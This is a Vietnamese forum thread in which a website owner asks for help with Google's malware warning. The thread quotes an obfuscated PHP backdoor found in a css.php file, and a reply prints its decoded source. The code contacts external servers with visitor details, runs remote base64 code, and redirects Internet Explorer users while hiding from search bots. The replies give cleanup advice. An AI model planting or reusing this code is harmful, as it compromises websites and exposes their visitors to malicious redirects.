Ask Site dính cảnh báo của google : Website có thể gây hại cho máy tính của bạn

[BKParabol]

Chả là mình có 1 site bị như tiêu đề, Mình có tìm thấy 1 file css.php có đoạn mã

<?php /* 1 */ eval(base64_decode("ZnVuY3Rpb24gZ2V0X3Rkc183NzcoJHVybCl7JGNvbnRlbnQ9IiI7JGNvbnRlbnQ9QHRyeWN1cmxfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmaWxlXzc3NygkdXJsKTtpZigkY29udGVudCE9PWZhbHNlKXJldHVybiAkY29udGVudDskY29udGVudD1AdHJ5Zm9wZW5fNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmc29ja29wZW5fNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlzb2NrZXRfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0dXJuICRjb250ZW50O3JldHVybiAnJzt9ICBmdW5jdGlvbiB0cnljdXJsXzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfaW5pdCcpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRjaCA9IGN1cmxfaW5pdCAoKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1VSTCwkdXJsKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTtjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTskcmVzdWx0ID0gY3VybF9leGVjICgkY2gpO2N1cmxfY2xvc2UoJGNoKTtpZiAoJHJlc3VsdD09IiIpcmV0dXJuIGZhbHNlO3JldHVybiAkcmVzdWx0O30gIGZ1bmN0aW9uIHRyeWZpbGVfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZmlsZScpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRpbmM9QGZpbGUoJHVybCk7JGJ1Zj1AaW1wbG9kZSgnJywkaW5jKTtpZiAoJGJ1Zj09IiIpcmV0dXJuIGZhbHNlO3JldHVybiAkYnVmO30gIGZ1bmN0aW9uIHRyeWZvcGVuXzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2ZvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JGJ1Zj0nJzskZj1AZm9wZW4oJHVybCwncicpO2lmICgkZil7d2hpbGUoIWZlb2YoJGYpKXskYnVmLj1mcmVhZCgkZiwxMDAwMCk7fWZjbG9zZSgkZik7fWVsc2UgcmV0dXJuIGZhbHNlO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5ZnNvY2tvcGVuXzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlzdHMoJ2Zzb2Nrb3BlbicpPT09ZmFsc2UpcmV0dXJuIGZhbHNlOyRwPUBwYXJzZV91cmwoJHVybCk7JGhvc3Q9JHBbJ2hvc3QnXTskdXJpPSRwWydwYXRoJ10uJz8nLiRwWydxdWVyeSddOyRmPUBmc29ja29wZW4oJGhvc3QsODAsJGVycm5vLCAkZXJyc3RyLDMwKTtpZighJGYpcmV0dXJuIGZhbHNlOyRyZXF1ZXN0ID0iR0VUICR1cmkgSFRUUC8xLjBcbiI7JHJlcXVlc3QuPSJIb3N0OiAkaG9zdFxuXG4iO2Z3cml0ZSgkZiwkcmVxdWVzdCk7JGJ1Zj0nJzt3aGlsZSghZmVvZigkZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKTtpZiAoJGJ1Zj09IiIpcmV0dXJuIGZhbHNlO2xpc3QoJG0sJGJ1Zik9ZXhwbG9kZShjaHIoMTMpLmNocigxMCkuY2hyKDEzKS5jaHIoMTApLCRidWYpO3JldHVybiAkYnVmO30gIGZ1bmN0aW9uIHRyeXNvY2tldF83NzcoJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdzb2NrZXRfY3JlYXRlJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QHBhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGlwMT1AZ2V0aG9zdGJ5bmFtZSgkaG9zdCk7JGlwMj1AbG9uZzJpcChAaXAybG9uZygkaXAxKSk7IGlmICgkaXAxIT0kaXAyKXJldHVybiBmYWxzZTskc29jaz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO2lmICghQHNvY2tldF9jb25uZWN0KCRzb2NrLCRpcDEsODApKXtAc29ja2V0X2Nsb3NlKCRzb2NrKTtyZXR1cm4gZmFsc2U7fSRyZXF1ZXN0ID0iR0VUICR1cmkgSFRUUC8xLjBcbiI7JHJlcXVlc3QuPSJIb3N0OiAkaG9zdFxuXG4iO3NvY2tldF93cml0ZSgkc29jaywkcmVxdWVzdCk7JGJ1Zj0nJzt3aGlsZSgkdD1zb2NrZXRfcmVhZCgkc29jaywxMDAwMCkpeyRidWYuPSR0O31Ac29ja2V0X2Nsb3NlKCRzb2NrKTtpZiAoJGJ1Zj09IiIpcmV0dXJuIGZhbHNlO2xpc3QoJG0sJGJ1Zik9ZXhwbG9kZShjaHIoMTMpLmNocigxMCkuY2hyKDEzKS5jaHIoMTApLCRidWYpO3JldHVybiAkYnVmO30gIGZ1bmN0aW9uIHVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpeyRhY3R1YWwxPSRfU0VSVkVSWydzX2ExJ107JGFjdHVhbDI9JF9TRVJWRVJbJ3NfYTInXTskdmFsPWdldF90ZHNfNzc3KCRhY3R1YWwxKTtpZiAoJHZhbD09IiIpJHZhbD1nZXRfdGRzXzc3NygkYWN0dWFsMik7JGY9QGZvcGVuKCR0ZHNmaWxlLCJ3Iik7aWYgKCRmKXtAZndyaXRlKCRmLCR2YWwpO0BmY2xvc2UoJGYpO31pZiAoc3Ryc3RyKCR2YWwsInx8fENPREV8fHwiKSl7bGlzdCgkdmFsLCRjb2RlKT1leHBsb2RlKCJ8fHxDT0RFfHx8IiwkdmFsKTtldmFsKGJhc2U2NF9kZWNvZGUoJGNvZGUpKTt9cmV0dXJuICR2YWw7fSAgZnVuY3Rpb24gZ2V0X2FjdHVhbF90ZHNfNzc3KCl7JGRlZmF1bHRkb21haW49JF9TRVJWRVJbJ3NfZDEnXTskZGlyPSRfU0VSVkVSWydzX3AxJ107JHRkc2ZpbGU9JGRpci4ibG9nMS50eHQiO2lmIChAZmlsZV9leGlzdHMoJHRkc2ZpbGUpKXskbXRpbWU9QGZpbGVtdGltZSgkdGRzZmlsZSk7JGN0aW1lPXRpbWUoKS0kbXRpbWU7aWYgKCRjdGltZT4kX1NFUlZFUlsnc190MSddKXskY29udGVudD11cGRhdGVfdGRzX2ZpbGVfNzc3KCR0ZHNmaWxlKTt9ZWxzZXskY29udGVudD1AZmlsZV9nZXRfY29udGVudHMoJHRkc2ZpbGUpO319ZWxzZXskY29udGVudD11cGRhdGVfdGRzX2ZpbGVfNzc3KCR0ZHNmaWxlKTt9JHRkcz1AZXhwbG9kZSgiXG4iLCRjb250ZW50KTskYz1AY291bnQoJHRkcykrMDskdXJsPSRkZWZhdWx0ZG9tYWluO2lmICgkYz4xKXskdXJsPXRyaW0oJHRkc1ttdF9yYW5kKDAsJGMtMildKTt9cmV0dXJuICR1cmw7fSAgZnVuY3Rpb24gaXNfbWFjXzc3NygkdWEpeyRtYWM9MDtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc19tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVhLCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdHJpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lFIDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgICRyej0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdLiIvLmxvZ3MvIjskbXo9Ii90bXAvIjtpZiAoIUBpc19kaXIoJHJ6KSl7QG1rZGlyKCRyeik7aWYgKEBpc19kaXIoJHJ6KSl7JG16PSRyejt9ZWxzZXskcno9JF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdLiIvLmxvZ3MvIjtpZiAoIUBpc19kaXIoJHJ6KSl7QG1rZGlyKCRyeik7aWYgKEBpc19kaXIoJHJ6KSl7JG16PSRyejt9fWVsc2V7JG16PSRyejt9fX1lbHNleyRtej0kcno7fSRib3Q9MDskdWE9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO2lmIChzdHJpc3RyKCR1YSwibXNuYm90Iil8fHN0cmlzdHIoJHVhLCJZYWhvbyIpKSRib3Q9MTtpZiAoc3RyaXN0cigkdWEsImJpbmdib3QiKXx8c3RyaXN0cigkdWEsImdvb2dsZSIpKSRib3Q9MTskbXNpZT0wO2lmIChpc19tc2llXzc3NygkdWEpKSRtc2llPTE7JG1hYz0wO2lmIChpc19tYWNfNzc3KCR1YSkpJG1hYz0xO2lmICgoJG1zaWU9PTApJiYoJG1hYz09MCkpJGJvdD0xOyAgICAkX1NFUlZFUlsnc19wMSddPSRtejsgICRfU0VSVkVSWydzX2IxJ109JGJvdDsgICRfU0VSVkVSWydzX3QxJ109MTIwMDsgICRfU0VSVkVSWydzX2QxJ109YmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMMlZ1Y3pFeU1ucDZlbVJrWVhwNkxtTnZiUzg9Jyk7ICAkZD0nP2Q9Jy51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJnA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlBIUF9TRUxGIl0pLiImYT0iLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyAgJF9TRVJWRVJbJ3NfYTEnXT1iYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwyMWhlR2xuWnk1eWRTOW5YMnh2WVdRdWNHaHcnKS4kZDsgICRfU0VSVkVSWydzX2EyJ109YmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMMjVzYVc1MGFHVjNiMjlrTG1OdmJTOW5YMnh2WVdRdWNHaHcnKS4kZDsgICRfU0VSVkVSWydzX3NjcmlwdCddPSJ0dC5waHA/eD0xIjsgIAlpZiAoJF9TRVJWRVJbJ3NfYjEnXT09MCl7ICAJCWhlYWRlcigiTG9jYXRpb246ICIuZ2V0X2FjdHVhbF90ZHNfNzc3KCkuJF9TRVJWRVJbJ3Nfc2NyaXB0J10pOyAgCQlleGl0OyAgCX0="));?>

Mình nghĩ là do mã trên gây nên cảnh báo trên. Vì thế mình lập topic này mong nhận được sự giúp đỡ của các pro làm sao để xóa hay khắc phục lỗi trên. Bác nào rành xin liên hệ BKParabol, mình xin cảm ơn và hậu tạ

 

[tara94221]

nhìn cái hàng chử đó mà mờ hết 2 con mắt

 

[BKParabol]

nhìn cái hàng chử đó mà mờ hết 2 con mắt

Quan trọng là đoạn mã này thôi bạn <?php /* 1 */ eval(base64_decode

 

[2tears]

Quan trọng là đoạn mã này thôi bạn <?php /* 1 */ eval(base64_decode

Cậu thử cái KIS lên,rồi vào site => nó hiện cảnh báo thì vẫn cố tình vào ( chọn bạn tự chịu trách nhiệm ...) xem KIS nó có phát hiện ra mã độc ko.nếu nó phát hiện ra thì chính là thủ phạm đấy,rồi vào site tìm rồi xóa đi

 

[trinhthai]

đây giải mã ra cho bạn nè:

function get_tds_777($url){$content="";$content=@trycurl_777($url);if($content!==false)return $content;$content=@tryfile_777($url);if($content!==false)return $content;$content=@tryfopen_777($url);if($content!==false)return $content;$content=@tryfsockopen_777($url);if($content!==false)return $content;$content=@trysocket_777($url);if($content!==false)return $content;return '';} function trycurl_777($url){if(function_exists('curl_init')===false)return false;$ch = curl_init ();curl_setopt ($ch, CURLOPT_URL,$url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_TIMEOUT, 5);curl_setopt ($ch, CURLOPT_HEADER, 0);$result = curl_exec ($ch);curl_close($ch);if ($result=="")return false;return $result;} function tryfile_777($url){if(function_exists('file')===false)return false;$inc=@file($url);$buf=@implode('',$inc);if ($buf=="")return false;return $buf;} function tryfopen_777($url){if(function_exists('fopen')===false)return false;$buf='';$f=@fopen($url,'r');if ($f){while(!feof($f)){$buf.=fread($f,10000);}fclose($f);}else return false;if ($buf=="")return false;return $buf;} function tryfsockopen_777($url){if(function_exists('fsockopen')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$f=@fsockopen($host,80,$errno, $errstr,30);if(!$f)return false;$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";fwrite($f,$request);$buf='';while(!feof($f)){$buf.=fread($f,10000);}fclose($f);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;} function trysocket_777($url){if(function_exists('socket_create')===false)return false;$p=@parse_url($url);$host=$p['host'];$uri=$p['path'].'?'.$p['query'];$ip1=@gethostbyname($host);$ip2=@long2ip(@ip2long($ip1)); if ($ip1!=$ip2)return false;$sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);if (!@socket_connect($sock,$ip1,80)){@socket_close($sock);return false;}$request ="GET $uri HTTP/1.0\n";$request.="Host: $host\n\n";socket_write($sock,$request);$buf='';while($t=socket_read($sock,10000)){$buf.=$t;}@socket_close($sock);if ($buf=="")return false;list($m,$buf)=explode(chr(13).chr(10).chr(13).chr(10),$buf);return $buf;} function update_tds_file_777($tdsfile){$actual1=$_SERVER['s_a1'];$actual2=$_SERVER['s_a2'];$val=get_tds_777($actual1);if ($val=="")$val=get_tds_777($actual2);$f=@fopen($tdsfile,"w");if ($f){@fwrite($f,$val);@fclose($f);}if (strstr($val,"|||CODE|||")){list($val,$code)=explode("|||CODE|||",$val);eval(base64_decode($code));}return $val;} function get_actual_tds_777(){$defaultdomain=$_SERVER['s_d1'];$dir=$_SERVER['s_p1'];$tdsfile=$dir."log1.txt";if (@file_exists($tdsfile)){$mtime=@filemtime($tdsfile);$ctime=time()-$mtime;if ($ctime>$_SERVER['s_t1']){$content=update_tds_file_777($tdsfile);}else{$content=@file_get_contents($tdsfile);}}else{$content=update_tds_file_777($tdsfile);}$tds=@explode("\n",$content);$c=@count($tds)+0;$url=$defaultdomain;if ($c>1){$url=trim($tds[mt_rand(0,$c-2)]);}return $url;} function is_mac_777($ua){$mac=0;return $mac;} function is_msie_777($ua){$msie=0;if (stristr($ua,"MSIE 6")||stristr($ua,"MSIE 7")||stristr($ua,"MSIE 8")||stristr($ua,"MSIE 9"))$msie=1;return $msie;} $rz=$_SERVER["DOCUMENT_ROOT"]."/.logs/";$mz="/tmp/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}else{$rz=$_SERVER["SCRIPT_FILENAME"]."/.logs/";if (!@is_dir($rz)){@mkdir($rz);if (@is_dir($rz)){$mz=$rz;}}else{$mz=$rz;}}}else{$mz=$rz;}$bot=0;$ua=$_SERVER['HTTP_USER_AGENT'];if (stristr($ua,"msnbot")||stristr($ua,"Yahoo"))$bot=1;if (stristr($ua,"bingbot")||stristr($ua,"google"))$bot=1;$msie=0;if (is_msie_777($ua))$msie=1;$mac=0;if (is_mac_777($ua))$mac=1;if (($msie==0)&&($mac==0))$bot=1; $_SERVER['s_p1']=$mz; $_SERVER['s_b1']=$bot; $_SERVER['s_t1']=1200; $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8='); $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1']=base64_decode('aHR0cDovL21heGlnZy5ydS9nX2xvYWQucGhw').$d; $_SERVER['s_a2']=base64_decode('aHR0cDovL25saW50aGV3b29kLmNvbS9nX2xvYWQucGhw').$d; $_SERVER['s_script']="tt.php?x=1"; if ($_SERVER['s_b1']==0){ header("Location: ".get_actual_tds_777().$_SERVER['s_script']); exit; }

 

[ncxn]

dịch ngược lại thôi

 

[theocean]

là con backdoor rùi. Xóa đi nếu nếu ko muốn bị làm thịt.

 

[tunvit]

Ko biết site bạn tự code hay wordpress, joomla..? Nếu tự code thì mình tư vấn thế này:
B1: backup toàn bộ site về máy kể cả database, tải lên 1 site under construction (đẹp đẹp 1 tí, = tiếng anh càng tốt)
B2: gửi báo cáo cho google để dc remove khỏi thông báo
B3: kiểm tra bằng tay toàn bộ site lại xem có dính ifram hay javascript nào lạ ko (đọc ko hiểu chẳng hạn), nếu có thì gỡ ra hết hoặc dùng google webmaster tool để check sau đó gỡ hết ra
B4: up lại lên host

 

[nva1991]

Cái này chắc chắn là do thằng nào chơi xấu nó cài mã độc lên. Chắc vì bảo mật của web không tốt

 

[King]

Cái này xóa đi xong r` báo cho gg là mình xóa r` nó xem xét r` ok.

Bác check kĩ mấy file khác nhé, thường không chỉ nằm trong 1 file. nhớ đổi pass cpanel + user , mysql nữa là ok

 

[quocphu2503]

up backdoor mà chơit base64 , chả khác gì không mã hóa , thế up luôn cái source lên cho khỏe vãi thiết , site bác hiện tại là có khả năng có nhiều thứ khác trên site đấy nó đã up backdoor thì nó up thứ gì lên không được

 

[BKParabol]

Google webmaster tool nó báo thế này thì mình nghĩ chắc soure mới có file css trong wp-includes dính. Mình ko rõ cái này lắm. Bác nào rành vui lòng hướng dẫn mình với, mình sẽ trả phí để mong học hỏi. Cảm ơn

 

[danhtin2108]

http://maxigg.ru/g_load.php
http://nlinthewood.com/g_load.php

http://ens122zzzddazz.com/
sever 1,2 ^^!

cũng ko hiểu lắm @@

 

[alldownfile]

Google webmaster tool nó báo thế này thì mình nghĩ chắc soure mới có file css trong wp-includes dính. Mình ko rõ cái này lắm. Bác nào rành vui lòng hướng dẫn mình với, mình sẽ trả phí để mong học hỏi. Cảm ơn

bác xóa file nhiễm độc đó đi rồi thông báo lại với google khoảng 2-3 ngày là hết